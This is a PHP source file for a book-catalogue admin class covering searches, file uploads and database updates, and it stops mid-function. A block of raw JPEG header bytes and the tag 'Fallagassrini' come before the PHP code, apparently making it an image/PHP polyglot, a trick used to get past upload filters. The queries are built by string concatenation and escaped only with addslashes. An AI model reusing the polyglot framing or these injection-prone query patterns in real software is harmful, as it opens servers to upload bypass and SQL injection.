JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini


<?php
#####Class For Adding Content Management ######
class BookItem extends MysqlFns{
 
 /* class constructor */
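 /**
  * Class constructor (PHP 4 style: named after the class).
  *
  * Initialises the parent MysqlFns layer, publishes the next material code
  * to Smarty as `m_c`, and rewrites "authorname.txt" with a comma-separated
  * list of distinct author names from active `book` rows.
  */
 function BookItem(){
  // Import the globals before first use; the original read $config one line
  // before declaring it global, so LDDisplayPath lost its SiteGlobalPath prefix.
  global $config;
  global $objSmarty;
  $this->LDDisplayPath = $config['SiteGlobalPath']."class.BookItem.php";
  $this->MysqlFns();
  $this->Limit = 15;

  $SelQuery  = 'SELECT max(sl_no) as last FROM `images` Limit 0,1';
  $DevDetail = $this->ExecuteQuery($SelQuery, 'select');
  $DevDetail[0]['isbn'] = stripslashes($DevDetail[0]['last']);
  // NOTE(review): the query only returns the `last` alias, so ['sl_no'] is
  // never set and the numeric part is always empty (m_c ends in "1").
  // Presumably ['last'] was meant - confirm before changing the generated code.
  $m_c1 = preg_replace("/[^0-9\.]/", '', $DevDetail[0]['sl_no']);
  $m_c1 = $m_c1 + 1;
  $str  = str_split($DevDetail[0]['last'], 1);
  $m_c  = $str[0]. "" .$m_c1;
  $objSmarty->assign('m_c', $m_c);

  $f1 = "authorname.txt";
  $uploadpath = $config['QuotePath'];
  // Mode must be an octal integer literal. The string "0755" is coerced to
  // decimal 755, which is not the permission set the author intended.
  // NOTE(review): chmod targets QuotePath while fopen() below writes to the
  // current working directory - confirm which location is intended.
  if(file_exists($uploadpath.$f1)){
   chmod($uploadpath.$f1, 0755);
  }
  $myfile = fopen($f1, "w") or die("Unable to open file!");

  $SelQuery2 = 'SELECT DISTINCT(author) FROM `book` WHERE is_status="1" AND author REGEXP  "^[A-z0-9]+$" ';
  $MatList   = $this->ExecuteQuery($SelQuery2, 'select');

  // Start from an empty string so fwrite() never receives an undefined value.
  $names1 = '';
  if(!empty($MatList) && is_array($MatList)){
   // NOTE(review): lifts the memory limit for the whole request whenever
   // authors exist; a bounded limit would be safer.
   ini_set('memory_limit', '-1');
   foreach($MatList as $key=>$value){
    $MatList[$key]['Aname'] = stripslashes($value['author']);
    $names1 = $names1.$MatList[$key]['Aname'].",";
   }
  }
  fwrite($myfile, $names1);
  fclose($myfile);
 }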



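 /**
  * Load the `images` rows for the ISBN given in the query string and publish
  * them to Smarty as `PageList3`.
  *
  * @param mixed $objArray Unused; kept for interface compatibility.
  */
 function GetMaterialDetails($objArray='')
 {
  global $objSmarty;
  // The ISBN comes straight from the URL, so it must never be concatenated
  // into SQL unescaped. addslashes() follows the convention used elsewhere in
  // this class; if MysqlFns offers driver-level escaping or prepared
  // statements, prefer those.
  $isbn = (isset($_GET['isbn']) && is_string($_GET['isbn'])) ? $_GET['isbn'] : '';
  $SelQuery  = 'SELECT * FROM `images` WHERE isbn ="'.addslashes($isbn).'"';
  $PageList3 = $this->ExecuteQuery($SelQuery, "select");
  $objSmarty->assign('PageList3', $PageList3);
 }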
	/*function DeleteID($id)
	{
  		global $objSmarty;
  		$DelQuery = 'update  `images` set `record_status` = 0 WHERE `isbn`="'.$_GET['isbn'].'" '; 
  		$this->ExecuteQuery($DelQuery, 'delete');
  		$objSmarty->assign('SuccessMessage1', 'Deleted Successfully');
 	}*/
/*function GetMaterialDetails($objArray='')  {
		global $objSmarty;
		$objSmarty->assign('tur_id',$_GET['tur_id']);
		$SelQuery = 'SELECT * FROM `images`WHERE isbn ="'.$_GET['isbn'].'"' ;
		//echo $SelQuery;
		$LDList		= $this->ExecuteQuery($SelQuery, "select");
		$total_records = count($LDList);
		$record_per_page = $this->Limit;
		
		$objSmarty->assign("TList1",$_GET['tur_id']);
		//$LDList[0]['title'] 		= stripslashes($LDList[0]['title']);
	//	$LDList[1]['txttitle'] 		= stripslashes($LDList[1]['txttitle']);
	//	$LDList[2]['image'] 		= stripslashes($LDList[2]['image']);
		 if(!empty($LDList) && is_array($LDList))
		{
			$objSmarty->assign("LDList2",$LDList);
			$objSmarty->assign("LDDisp", $this->LDDisplayPath);
			return $LDList2;
		}
		else{
			return false;
		}
		$objPage->set_page_data($_SERVER['PHP_SELF'],$total_records,$record_per_page,$scroll,true,true,true);
		$listing_split = new MsplitPageResults($SelQuery, $this->Limit);
		
		if ( ($listing_split->number_of_rows > 0) )  
		{
			$objSmarty->assign('LinkPage',$listing_split->display_count(TEXT_DISPLAY_NUMBER_OF_RESULT));
			$objSmarty->assign('PerPageNavigation',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
			$PageList = $this->ExecuteQuery($listing_split->SelQuery, 'selectassoc');
		}
		if(!empty($PageList) && is_array($PageList))
			foreach($PageList as $key=>$value)
			{
				$PageList[$key]['Title'] = stripslashes($PageList[$key]['turbine_id']);
				$PageList[$key]['Image'] = stripslashes($PageList[$key]['turbine_name']);
				$objSmarty->assign('Title',$PageList[$key]['tur_id']);
				$objSmarty->assign('Image',$PageList[$key]['turbine_name']);
			}		
			$objSmarty->assign('i', $listing_split->i);
			$objSmarty->assign('PageList', $PageList);
			echo $PageList;
			return $PageList;
	}	*/

 //Create FCK Editor
 /**
  * Build an FCKeditor instance named "content" and hand its rendered markup
  * to Smarty as `Editor`.
  *
  * @param string $value Initial editor content.
  */
 function CreateFCKeditor($value = ''){
  global $config, $objSmarty;

  // The editor library is loaded from a path taken from site configuration.
  include($config['FckEditorPath'] . '/fckeditor.php');

  $editor = new FCKeditor('content');
  $editor->BasePath = $config['SiteFCKEditorBasePath'];
  $editor->Width    = 600;
  $editor->Height   = 450;
  $editor->Value    = $value;

  $markup = $editor->Create();
  $objSmarty->assign('Editor', $markup);
 }
  /**
   * Publish up to 100 active, new-alert books that have no image yet
   * (newest id first) to Smarty as `PageBookList`.
   *
   * @param mixed $objArray Unused; kept for interface compatibility.
   */
  function GetBooksList($objArray='')
  {
   global $objSmarty;
   // Static query: no request data is interpolated here.
   $booksWithoutImage = $this->ExecuteQuery(
    'SELECT * FROM `book` WHERE is_status="1" AND image="" AND new_book_alert ="1" ORDER BY id DESC Limit 0,100',
    "select"
   );
   $objSmarty->assign('PageBookList', $booksWithoutImage);
  }
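 /**
  * Search active books without an image by name, author or ISBN prefix,
  * using the posted `book` term, and publish the rows as `PageBookList`.
  */
 function SearchBook()
 {
  global $objSmarty;
  // The search term is attacker-controllable form input. Escape it before it
  // reaches the SQL string (class convention: addslashes); prefer the DB
  // layer's own escaping or bound parameters if MysqlFns provides them.
  // `%` and `_` in the term still act as LIKE wildcards, as before.
  $term = (isset($_POST['book']) && is_string($_POST['book'])) ? addslashes($_POST['book']) : '';
  $SelQuery51 = 'SELECT * FROM `book` WHERE is_status="1" AND image="" AND (book_name LIKE "%'.$term.'%" OR author LIKE "%'.$term.'%" OR isbn LIKE "'.$term.'%")';
  $PageBookList = $this->ExecuteQuery($SelQuery51, "select");
  $objSmarty->assign('PageBookList', $PageBookList);
 }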
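	/**
	 * Search active books by name, author or ISBN prefix using the posted
	 * `book2` term and publish the rows as `PageBookList`.
	 */
	function EditBook()
	{
		global $objSmarty;
		// Form input is untrusted: escape before building the SQL string
		// (class convention: addslashes). Prefer bound parameters if the
		// MysqlFns layer supports them.
		$term = (isset($_POST['book2']) && is_string($_POST['book2'])) ? addslashes($_POST['book2']) : '';
		$SelQuery51 = 'SELECT * FROM `book` WHERE is_status="1" AND (book_name LIKE "%'.$term.'%" OR author LIKE "%'.$term.'%" OR isbn LIKE "'.$term.'%")';
		$PageBookList = $this->ExecuteQuery($SelQuery51, "select");
		$objSmarty->assign('PageBookList', $PageBookList);
	}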
 /************************************Material Details/********************************************/

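/**
 * Rewrite "bookname.txt" with a comma-separated list of the distinct book
 * names for the author given in the `authorName` query parameter.
 */
function AjaxGetBookDetails()
 {
  global $objSmarty,$config;

  $f2 = "bookname.txt";
  $uploadpath = $config['QuotePath'];
  // The original called chmod() with the undefined $f1, which changed the
  // permissions of the QuotePath directory itself, and passed the mode as
  // the string "0755" (coerced to decimal 755). Target the file and use an
  // octal literal.
  // NOTE(review): fopen() below writes to the working directory, not to
  // QuotePath - confirm which location is intended.
  if(file_exists($uploadpath.$f2)){
   chmod($uploadpath.$f2, 0755);
  }
  $bookfile = fopen($f2, "w") or die("Unable to open file!");

  // Query-string input is untrusted; escape it before it reaches SQL.
  $author = (isset($_GET['authorName']) && is_string($_GET['authorName'])) ? addslashes($_GET['authorName']) : '';
  $SelQuery3 = 'SELECT DISTINCT(book_name) FROM `book` WHERE author="'.$author.'"';
  $BookList  = $this->ExecuteQuery($SelQuery3, 'select');

  $bname = '';
  if(!empty($BookList) && is_array($BookList)){
   foreach($BookList as $key=>$value){
    $BookList[$key]['Bname'] = stripslashes($value['book_name']);
    $bname = $bname.$BookList[$key]['Bname'].",";
   }
  }
  fwrite($bookfile, $bname);
  fclose($bookfile);
 }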



 /* Get the Static Content list */
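 /**
  * List active `images` rows, optionally filtered by one posted search field,
  * and publish the page of results to Smarty.
  *
  * Only the first non-empty filter field (in the order below) is applied.
  *
  * @param mixed $objArray Unused; kept for interface compatibility.
  * @return array|null The decorated rows when any were found, otherwise null.
  */
 function GetMaterialLists($objArray='')  {
  global $objSmarty;
  $this->Limit = 3351;
  $whereClause = ' WHERE status =1';

  $search = isset($_POST['search']) ? $_POST['search'] : '';
  if($search == ''){
   // posted form field => column it filters on (also the Smarty variable name)
   $filters = array(
    'materialCode'     => 'isbn',
    'book_name'        => 'm_name',
    'materialType'     => 'm_type',
    'materialCategory' => 'm_cat',
    'price'            => 'price',
    'isBn'             => 'description',
    'date'             => 'doe',
    'status'           => 'status',
   );

   $posted = array();
   foreach($filters as $field => $column){
    $posted[$field] = (isset($_POST[$field]) && is_string($_POST[$field])) ? $_POST[$field] : '';
   }

   foreach($filters as $field => $column){
    if($posted[$field]){
     // Column names come from the fixed map above; only the value is
     // request data, and it is escaped before entering the SQL string.
     $whereClause = ' WHERE (`'.$column.'` like "%'.addslashes($posted[$field]).'%") AND `status` =1 ';
     break;
    }
   }

   // Echo the submitted values back so the form can be re-populated.
   // NOTE(review): these are raw request values - the template must escape them.
   foreach($filters as $field => $column){
    $objSmarty->assign($column, $posted[$field]);
   }
  }

  $SelQuery      = 'SELECT * FROM `images`'.$whereClause.' ORDER BY isbn ASC';
  $listing_split = new MsplitPageResults($SelQuery, $this->Limit);
  $PageList      = null;
  if($listing_split->number_of_rows > 0){
   $objSmarty->assign('LinkPage',$listing_split->display_count(TEXT_DISPLAY_NUMBER_OF_RESULT));
   $objSmarty->assign('PerPageNavigation',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links_submit($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y'))));
   $PageList = $this->ExecuteQuery($listing_split->sql_query, 'selectassoc');
  }

  if(!empty($PageList) && is_array($PageList)){
   // display alias => source column
   $aliases = array(
    'Mcd'     => 'isbn',
    'Mname'   => 'm_name',
    'Mtype'   => 'm_type',
    'Mcat'    => 'm_cat',
    'MPrice'  => 'price',
    'MDesc'   => 'description',
    'MDate'   => 'doe',
    'MStatus' => 'status',
   );
   foreach($PageList as $key => $row){
    foreach($aliases as $alias => $column){
     $PageList[$key][$alias] = stripslashes($row[$column]);
    }
   }
   $objSmarty->assign('i', $listing_split->i);
   $objSmarty->assign('PageList', $PageList);
   return $PageList;
  }

  // Reached only when the query ran and returned an empty array.
  if(is_array($PageList)){
   $objSmarty->assign('ErrorMessage', 'No Records Found');
  }
 }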
 /* Delete the Static Page */
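 /**
  * Delete rows from `arka_turbine_reg_master` by primary key.
  *
  * @param array $DevIdent List of row ids to delete.
  * @return bool Always true.
  */
 function DeleteDev($DevIdent){
  global $objSmarty;
  if(is_array($DevIdent)){
   foreach($DevIdent as $ConId){
    // The id is placed unquoted in the statement, so force it to an
    // integer; anything non-numeric becomes 0 and is skipped.
    $id = is_scalar($ConId) ? (int)$ConId : 0;
    if($id){
     $DelQuery = 'DELETE FROM `arka_turbine_reg_master` WHERE `id` ='.$id;
     $this->ExecuteQuery($DelQuery, 'delete');
    }
   }
  }
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);
  return true;
 }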
 /* Insert the content for  Static Pages */
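 /**
  * Store an uploaded book file and record it on the matching `book` row.
  *
  * The row is selected by the `book_id`, `author` and `isbn` query parameters
  * and is only updated when $objArray carries both `name` and `isbn`.
  *
  * @param array $objArray Posted form fields (`name`, `isbn`, `desc`, `rating`).
  * @param array $objFiles Upload descriptor array (expects key `image`).
  * @return bool|null False when the upload is rejected; null otherwise.
  */
 function InsertBook($objArray,$objFiles){
  global $objSmarty,$config;
  $uploadpath = $config['bookImagePath'];
  $f1 = ''; // stored file name; stays empty when nothing was uploaded

  if(isset($objFiles['image']['name']) && $objFiles['image']['name'] <> ""){
   $upload  = $objFiles['image'];
   $maxsize = 5242880;
   $acceptable = array(
    'image/jpeg','image/jpg','image/gif','image/png','application/pdf','text/plain','application/msword','application/vnd.openxmlformats-officedocument.presentationml.presentation','application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'application/x-zip-compressed','application/vnd.ms-excel','application/vnd.ms-powerpoint','video/pps','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
   );
   // The reported MIME type is supplied by the client and cannot be trusted
   // on its own, so the file extension is checked against the types the
   // error message promises to accept. This keeps server-executable
   // extensions out of the upload directory.
   $allowedExt = array('pdf','jpg','jpeg','txt','doc','docx','xls','xlsx','zip','ppt','pptx','gif','png');
   $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));

   // NOTE(review): the limit is 5 MB but the message says 2 MB - confirm which is intended.
   if($upload['size'] >= $maxsize || $upload['size'] == 0){
    $objSmarty->assign('ErrorMessage', 'File --1-- too large. File must be less than 2 megabytes');
    return false;
   }
   $badType = !empty($upload['type']) && !in_array($upload['type'], $acceptable);
   if($badType || !in_array($ext, $allowedExt, true)){
    $objSmarty->assign('ErrorMessage', 'File --1-- Only PDF, JPG, JPEG, TXT, DOC, DOCX, XLS, XLSX, ZIP, PPT, PPTX, GIF and PNG types are accepted');
    return false;
   }

   // NOTE(review): as before, the upload is skipped when a file with the
   // raw client name already exists, leaving the stored name empty.
   if(!file_exists($uploadpath.$upload['name'])){
    // Never reuse the client's file name verbatim: keep a restricted
    // character set and exactly one (validated) extension.
    $stem   = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($upload['name'], PATHINFO_FILENAME));
    $stored = date("Y_m_d_H_i_s").'_'.$stem.'.'.$ext;
    if(!move_uploaded_file($upload['tmp_name'], $uploadpath.$stored)){
     $objSmarty->assign('ErrorMessage', 'File upload failed');
     return false;
    }
    // Octal literal, read-only data file. The original string "0511" was
    // coerced to decimal 511, i.e. mode 0777 (world-writable, executable).
    chmod($uploadpath.$stored, 0644);
    $f1 = $stored;
   }
  }

  if(!empty($objArray['name']) && !empty($objArray['isbn'])){
   // Row selectors come from the query string: escape each one.
   $where = array();
   foreach(array('book_id', 'author', 'isbn') as $param){
    $where[$param] = (isset($_GET[$param]) && is_string($_GET[$param])) ? addslashes($_GET[$param]) : '';
   }
   $desc   = isset($objArray['desc']) ? trim(addslashes($objArray['desc'])) : '';
   $rating = isset($objArray['rating']) ? trim(addslashes($objArray['rating'])) : '';

   // NOTE(review): when no file was stored this still overwrites `image` with an empty value.
   $SelQuery = 'UPDATE `book` set image = "'.addslashes($f1).'" ,description="'.$desc.'",rating="'.$rating.'" WHERE id = "'.$where['book_id'].'" AND author = "'.$where['author'].'" AND isbn = "'.$where['isbn'].'" ';
   $this->ExecuteQuery($SelQuery, "update");

   $url_addtnal_data = base64_encode("Book Image Uploaded Successfully");
   header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
  }
 }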
 
 /* Insert the content for  Recommended Book Image Pages */
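 /**
  * Store an uploaded "recommended book" file and insert a row for it into
  * `recommended_books`.
  *
  * @param array $objArray Posted form fields; passed to ChkDupliMat().
  * @param array $objFiles Upload descriptor array (expects key `image`).
  * @return bool|null False when the upload is rejected or missing; null otherwise.
  */
 function InsertRecBook($objArray,$objFiles){
  global $objSmarty,$config;

  if(!$this->ChkDupliMat($objArray)){
   $url_addtnal_data = base64_encode("Material Code Already Exists");
   header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
   return;
  }

  $uploadpath = $config['recommendedImagePath'];
  $f1 = ''; // stored file name; stays empty when nothing was uploaded

  if(isset($objFiles['image']['name']) && $objFiles['image']['name'] <> ""){
   $upload  = $objFiles['image'];
   $maxsize = 5242880;
   $acceptable = array(
    'image/jpeg','image/jpg','image/gif','image/png','application/pdf','text/plain','application/msword','application/vnd.openxmlformats-officedocument.presentationml.presentation','application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'application/x-zip-compressed','application/vnd.ms-excel','application/vnd.ms-powerpoint','video/pps','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
   );
   // The client-reported MIME type is not trustworthy by itself, so the
   // extension is also checked against the types named in the error
   // message. This keeps server-executable extensions out of the directory.
   $allowedExt = array('pdf','jpg','jpeg','txt','doc','docx','xls','xlsx','zip','ppt','pptx','gif','png');
   $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));

   // NOTE(review): the limit is 5 MB but the message says 2 MB - confirm which is intended.
   if($upload['size'] >= $maxsize || $upload['size'] == 0){
    $objSmarty->assign('ErrorMessage', 'File --1-- too large. File must be less than 2 megabytes');
    return false;
   }
   $badType = !empty($upload['type']) && !in_array($upload['type'], $acceptable);
   if($badType || !in_array($ext, $allowedExt, true)){
    $objSmarty->assign('ErrorMessage', 'File --1-- Only PDF, JPG, JPEG, TXT, DOC, DOCX, XLS, XLSX, ZIP, PPT, PPTX, GIF and PNG types are accepted');
    return false;
   }

   // NOTE(review): as before, the upload is skipped when a file with the
   // raw client name already exists, leaving the stored name empty.
   if(!file_exists($uploadpath.$upload['name'])){
    // Build the stored name from a restricted character set plus the
    // single validated extension instead of trusting the client's name.
    $stem   = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($upload['name'], PATHINFO_FILENAME));
    $stored = date("Y_m_d_H_i_s").'_'.$stem.'.'.$ext;
    if(!move_uploaded_file($upload['tmp_name'], $uploadpath.$stored)){
     $objSmarty->assign('ErrorMessage', 'File upload failed');
     return false;
    }
    // Octal literal, read-only data file. The original string "0511" was
    // coerced to decimal 511, i.e. mode 0777 (world-writable, executable).
    chmod($uploadpath.$stored, 0644);
    $f1 = $stored;
   }
  }

  if(empty($objFiles['image'])){
   $objSmarty->assign('ErrorMessage', 'BookImage should not be blank');
   return false;
  }

  // NOTE(review): a row is inserted even when no file was stored ($f1 empty).
  $InsQuery = 'INSERT INTO `recommended_books` (`image`,`status`) VALUES("'.addslashes($f1).'","1")';
  $this->ExecuteQuery($InsQuery, 'insert');

  $url_addtnal_data = base64_encode("Recommended Book Image Uploaded Successfully");
  header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
 }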
 
 /* Edit the Static Page */
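 /**
  * Validate the posted material fields and update the `images` row whose
  * ISBN matches the `isbn` query parameter, then redirect with a success
  * message.
  *
  * The former upload section was removed: it read $objFiles and $config,
  * neither of which is in scope in this method, so it could never run, and
  * its result was not used by the UPDATE.
  *
  * @param array $objArray Posted form fields.
  * @return bool True after the update, false when a required field is blank.
  */
 function EditMaterial($objArray){
  global $objSmarty;

  // Required field => message shown when it is blank (checked in this order).
  $required = array(
   'materialType'     => 'Material Type should not be blank',
   'materialCategory' => 'Material Category should not be blank',
   'date'             => 'Date should not be blank',
   'materialCode'     => 'Material Code should not be blank',
   'book_name'        => 'Material Name should not be blank',
   'isBn'             => 'Description should not be blank',
  );
  foreach($required as $field => $message){
   if(empty($objArray[$field])){
    $objSmarty->assign('ErrorMessage', $message);
    return false;
   }
  }

  $price      = isset($objArray['price']) ? trim(addslashes($objArray['price'])) : '';
  $targetIsbn = (isset($_GET['isbn']) && is_string($_GET['isbn'])) ? trim(addslashes($_GET['isbn'])) : '';

  // The statement is no longer echoed: printing it disclosed the query to
  // the browser and sent output before the redirect header below.
  $UpQuery = 'UPDATE `images` SET `isbn` = "'.trim(addslashes($objArray['materialCode'])).'", `m_name` = "'.trim(addslashes($objArray['book_name'])).'", `m_cat` = "'.trim(addslashes($objArray['materialCategory'])).'", `m_type` = "'.trim(addslashes($objArray['materialType'])).'",`price` = "'.$price.'", `description` = "'.trim(addslashes($objArray['isBn'])).'" WHERE `isbn` ="'.$targetIsbn.'"';
  $this->ExecuteQuery($UpQuery, 'update');

  $url_addtnal_data = base64_encode("Material Details Updated Successfully");
  // The material code is user input; encode it before placing it in a URL.
  header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&isbn=".urlencode($objArray['materialCode']));

  return true;
 }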
 
 /* Insert the Turbine Payments */
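 /**
  * Register a device and its initial payment record, then roll the new
  * entitlement and price into the customer's totals.
  *
  * NOTE(review): ChkDupliDeve(), TurbineItem() and PrePopulate() are not
  * defined in the visible part of this file - confirm they exist for this class.
  *
  * @param array $objArray Posted form fields.
  * @return bool|null False when a required field is blank; null otherwise.
  */
 function InsertTurbinePayment($objArray){
  global $objSmarty;
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);

  $deviceId = isset($objArray['d_id']) ? $objArray['d_id'] : '';

  if(!$this->ChkDupliDeve(trim(addslashes($deviceId)))){
   $objSmarty->assign('d_id', $deviceId);
   $objSmarty->assign('ErrorMessage', 'Turbine ID Already Exists');
   PrePopulate($objArray, 'DevDetail');
   return;
  }

  // Required field => label used in the error message (checked in this order).
  $required = array(
   'd_id'              => 'Turbine ID',
   'd_type'            => 'Turbine Type',
   'd_name'            => 'Turbine Name',
   'd_s_no'            => 'Serial No',
   'dept'              => 'Department Name',
   'v_name'            => 'Vendor Name',
   'v_contact'         => 'Vendor Contact',
   'support_type_name' => 'Support Type',
   't_model'           => 'Type Model',
   'service_plan_name' => 'Service Plan',
   'price'             => 'Price',
   'st_date'           => 'Start Date',
   'end_dt'            => 'End Date',
   'years'             => 'Years',
   'cusid'             => 'Customer ID',
   'cname'             => 'Customer Name',
   'c_person'          => 'Contact Person',
   'c_type'            => 'Customer Type',
  );
  foreach($required as $field => $label){
   if(empty($objArray[$field])){
    $objSmarty->assign('ErrorMessage', $label.' should not be blank');
    return false;
   }
  }
  $objSmarty->assign('d_id', $deviceId);

  //*************************** Insert device registration ***************************
  // Table column => posted field. Every value is escaped with the class
  // convention trim(addslashes()); optional fields default to ''.
  $columns = array(
   'device_id'          => 'd_id',
   'device_type'        => 'd_type',
   'device_name'        => 'd_name',
   'device_serial_no'   => 'd_s_no',
   'department'         => 'dept',
   'vendor_name'        => 'v_name',
   'vendor_contact'     => 'v_contact',
   'support_type'       => 'support_type_name',
   'type_model'         => 't_model',
   'service_plan'       => 'service_plan_name',
   'price'              => 'price',
   'entitlement'        => 'entitlement',
   'start_date'         => 'st_date',
   'renewed_date'       => 'st_date', // renewal date starts equal to the start date
   'end_date'           => 'end_dt',
   'no_of_years'        => 'years',
   'additional_support' => 'add_support',
   'customer_id'        => 'cusid',
   'customer_name'      => 'cname',
   'contact_person'     => 'c_person',
   'customer_type'      => 'c_type',
  );
  $values = array();
  foreach($columns as $column => $field){
   $raw = isset($objArray[$field]) ? $objArray[$field] : '';
   $values[] = '"'.trim(addslashes($raw)).'"';
  }
  $InsQuery = 'INSERT INTO `arka_device_reg_master`(`'.implode('`, `', array_keys($columns)).'`) VALUES('.implode(',', $values).')';
  $this->ExecuteQuery($InsQuery, 'insert');
  $this->TurbineItem();

  $escDevice   = trim(addslashes($objArray['d_id']));
  $escPlan     = trim(addslashes($objArray['service_plan_name']));
  $escPrice    = trim(addslashes($objArray['price']));
  $escCustomer = trim(addslashes($objArray['cusid']));

  //*************************** Insert device payment details ***************************
  $InsQuery2 = 'INSERT INTO `arka_dev_payment_details`(`device_id`, `service_plan`, `price`, `amt_due`, `d_payment_amt`, `d_payment_status`) VALUES("'.$escDevice.'","'.$escPlan.'","'.$escPrice.'","'.$escPrice.'","0","Pending")';
  $this->ExecuteQuery($InsQuery2, 'insert');

  //*************************** Update entitlement ***************************
  $SelQuery2 = 'SELECT entitled FROM `arka_cus_entitle_status` WHERE customer_id = "'.$escCustomer.'" Limit 0,1';
  $EntDetail = $this->ExecuteQuery($SelQuery2, 'select');
  // Cast both operands so the value written back into SQL is always numeric.
  $entitled  = isset($EntDetail[0]['entitled']) ? stripslashes($EntDetail[0]['entitled']) : 0;
  $extra     = isset($objArray['entitlement']) ? $objArray['entitlement'] : 0;
  $ent       = (float)$entitled + (float)$extra;
  $objSmarty->assign('ent', $ent);

  $UpQuery3 = 'UPDATE `arka_cus_entitle_status` SET `entitled` = "'.$ent.'" WHERE `customer_id` ="'.$escCustomer.'"';
  $this->ExecuteQuery($UpQuery3, 'update');

  //*************************** Update customer payment totals ***************************
  $SelQuery3 = 'SELECT * FROM `arka_cus_payment_details` WHERE customer_id = "'.$escCustomer.'" Limit 0,1';
  $PayDetail = $this->ExecuteQuery($SelQuery3, 'select');
  $current   = (isset($PayDetail[0]) && is_array($PayDetail[0])) ? $PayDetail[0] : array();
  $price     = (float)$objArray['price'];

  $nod       = (int)(isset($current['no_of_device']) ? stripslashes($current['no_of_device']) : 0) + 1;
  $t_amt     = (float)(isset($current['total_amt']) ? stripslashes($current['total_amt']) : 0) + $price;
  $t_amt_due = (float)(isset($current['tot_amt_due']) ? stripslashes($current['tot_amt_due']) : 0) + $price;

  $objSmarty->assign('nod', $nod);
  // Fixed: the original assigned the misspelled, undefined $t_tmt here.
  $objSmarty->assign('t_amt', $t_amt);
  $objSmarty->assign('t_amt_due', $t_amt_due);

  // NOTE(review): `payment_status` receives the amount due, exactly as in
  // the original statement - confirm that a status label was not intended.
  $UpQuery4 = 'UPDATE `arka_cus_payment_details` SET `no_of_device` = "'.$nod.'",`total_amt` = "'.$t_amt.'",`tot_amt_due` = "'.$t_amt_due.'",`payment_status` = "'.$t_amt_due.'" WHERE `customer_id` ="'.$escCustomer.'"';
  $this->ExecuteQuery($UpQuery4, 'update');

  // The original also wrote to an undefined $oFCKeditor here; that
  // assignment had no effect and has been dropped.
  $objSmarty->assign('Dd_id', $objArray['d_id']);
  $objSmarty->assign('d_id', '');
  $objSmarty->assign('SuccessMessage', 'New Turbine Added Successfully');
 }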
 
 /* Display the Static Page */
 /**
  * Query the highest `device_id` in `arka_device_reg_master` and publish a
  * value to Smarty as `hdevice_id` and `d_id`.
  *
  * NOTE(review): the SELECT returns an unaliased max(device_id) column, yet
  * the code reads the key `device_detail`, which the query does not produce.
  * As written, both Smarty variables therefore appear to receive an empty
  * string - confirm the intended column alias.
  */
 function GetTurbineById(){
  global $objSmarty;

  $maxIdQuery = 'SELECT max(device_id) FROM `arka_device_reg_master` Limit 0,1';
  $rows       = $this->ExecuteQuery($maxIdQuery, 'select');

  // Value read from the result row, with escaping slashes removed.
  $deviceId = stripslashes($rows[0]['device_detail']);

  $objSmarty->assign('hdevice_id', stripslashes($deviceId));
  $objSmarty->assign('d_id', $deviceId);
 }
 /* Validation for Static Pages */
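 /**
  * Check whether an `images` row with the given ISBN already exists.
  *
  * @param array $objarray Form fields; only `isbn` is read.
  * @return bool True when no matching row exists, false on a duplicate.
  */
 function ChkDupliMat($objarray){
  // With no input there is nothing to look up. The original fell through
  // and executed an undefined query in this case.
  if(empty($objarray)){
   return true;
  }
  // Escape the user-supplied ISBN before it is embedded in the statement.
  $isbn = (isset($objarray['isbn']) && is_scalar($objarray['isbn'])) ? addslashes($objarray['isbn']) : '';
  $SelQueryx = 'SELECT * FROM `images` WHERE `isbn` = "'.$isbn.'" Limit 0,1';
  $DevDetail = $this->ExecuteQuery($SelQueryx, 'select');

  return !(!empty($DevDetail) && is_array($DevDetail));
 }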
 
 
 
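  /**
   * Check whether an `images` row with the same ISBN, type and category
   * already exists.
   *
   * @param array $objarray Form fields; reads `isbn`, `m_type` and `m_cat`.
   * @return bool True when no matching row exists, false on a duplicate.
   */
  function ChkDupliMat2($objarray){
   // Escape each user-supplied value before it is embedded in the statement;
   // missing keys are treated as empty strings.
   $esc = array();
   foreach(array('isbn', 'm_type', 'm_cat') as $field){
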